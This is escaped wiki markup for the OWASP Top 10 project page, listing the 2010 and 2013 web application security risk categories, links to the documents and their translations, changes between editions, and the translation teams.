* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
